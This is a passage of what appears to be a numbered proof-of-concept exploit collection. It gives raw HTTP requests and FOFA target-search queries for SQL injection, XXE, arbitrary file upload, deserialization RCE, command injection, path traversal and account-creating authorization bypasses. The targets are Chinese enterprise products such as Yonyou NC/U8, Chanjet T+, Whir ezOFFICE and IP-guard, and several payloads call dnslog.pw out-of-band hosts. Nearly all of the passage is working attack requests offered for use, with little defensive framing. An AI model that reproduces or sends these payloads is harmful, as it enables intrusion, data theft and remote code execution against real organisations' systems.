User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. 用友U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud 政府财务云 arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. 用友U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业ERP系统 validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: access the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) Lian'ai Cloud (脸爱云) one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Whir (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. Whir (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the path it is written to, and the fileType parameter sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Whir (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Whir (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Whir (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

